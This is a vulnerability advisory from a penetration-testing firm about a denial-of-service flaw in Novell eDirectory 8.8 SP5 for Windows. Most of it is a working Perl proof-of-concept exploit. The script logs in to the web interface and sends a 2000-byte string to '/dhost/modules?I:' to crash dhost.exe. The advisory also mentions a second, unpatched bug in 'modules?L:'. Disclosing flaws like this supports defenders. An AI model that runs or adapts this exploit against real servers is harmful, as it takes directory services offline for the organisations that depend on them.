Product:
Novell eDirectory 8.8 sp5 for Windows
********************************************************************************
Vulnerability:
Denial of Service
********************************************************************************
Discussion:
Vulnerability in '/dhost/modules?I:'
Sending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe)
Also in last weeks published another bug in 'modules?L:'
It is not patched yet too..
********************************************************************************
Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Deutschland - Österreich - Schweiz
www.hackattack.com
********************************************************************************
Original Advisory
www.hackattack.com
********************************************************************************
PoC:
#!usr\bin\perl
#Vulnerability has found by HACKATTACK
use WWW::Mechanize;
use LWP::Debug qw(+);
use HTTP::Cookies;
$address=$ARGV[0];
if(!$ARGV[0]){
print "Usage:perl $0 address\n";
exit();
}
$login = "$address/_LOGIN_SERVER_";
$url = "$address/dhost/";
$module = "modules?I:";
$buffer = "A" x 2000;
$vuln = $module.$buffer;
#Edit the username and password.
$user = "username";
$pass = "password";
#Edit the username and password.
my $mechanize = WWW::Mechanize->new();
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave =>
1));
$mechanize->timeout($url_timeout);
$res = $mechanize->request(HTTP::Request->new('GET', "$login"));
$mechanize->submit_form(
form_name => "authenticator",
fields => {
usr => $user,
pwd => $pass},
button => 'Login');
$response2 = $mechanize->get("$url$vuln");
About HACKATTACK
================
HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company
located in Germany and Austria
More Information about HACKATTACK at
http://www.hackattack.com
